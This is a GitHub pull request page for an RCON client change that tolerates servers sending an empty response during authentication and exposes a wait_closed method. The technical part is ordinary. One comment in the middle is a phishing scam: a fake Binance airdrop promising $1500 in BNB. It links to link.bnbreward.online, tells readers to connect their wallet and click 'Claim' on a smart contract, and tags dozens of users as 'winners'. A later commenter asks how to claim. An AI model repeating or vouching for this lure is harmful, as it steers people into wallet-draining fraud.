### PR TITLE
Deal with some servers that send an empty response first

### PR DESCRIPTION
**Pull request by hydrogen18**
Some applications apparently send an empty response during authentication. I found this info here:

https://developer.valvesoftware.com/wiki/Source_RCON_Protocol#SERVERDATA_RESPONSE_VALUE

Factorio from Wube Software does not, but some games based on the Source engine might.

Also I am exposing the `wait_closed` method so that whenever you can call close you can wait on it. Otherwise I get warnings about that.

### CODE REVIEW

**Comment by hydrogen18** [comment]
Any chance we can get this merged?

**Comment by sandeep661** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[Claim Now](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @JoshuaKimsey, @elisalter, @polivon-rms, @NikoXu, @AdriannaBisikiewicz, @Sandalots, @Tacumi, @pygeek, @liqi0wer, @GusNico, @Steve-Hawk, @LanDeQuHuXi, @Alexandru-Chindris, @zecho, @rblaine95, @GradeyCullins, @hashkar123, @awalo666, @gavvvr, @rishispeets, @danielduberg, @binarytrails, @OmeGak, @pPrecel, @imsamroy, @sksankarraj, @sajanki, @CrazyCoderShi, @tealalala, @tty46g, @zcaceres, @Guerrillo, @arobbins, @duncan-wong, @liuderchi, @Troska2323, @angelcabo, @yaoyaoTheCat, @BhavikParikh11, @hwgao, @LeoWeyles, @dasNavy, @hawtim, @OFRM, @louim-lbs, @Wokening, @vpeopleonatank, @jaykru, @Dhruv-Rayat1, @kuBiMaNong177

**Comment by Dhruv-Rayat1** [comment]
i am interested, how do I claim my 1500?

**Comment by Dhruv-Rayat1** [comment]
alr cool do I need to do any initiations to join this cult! Maybe a blood
sacrifice? give me your blood NOW!

**Pull request merged**
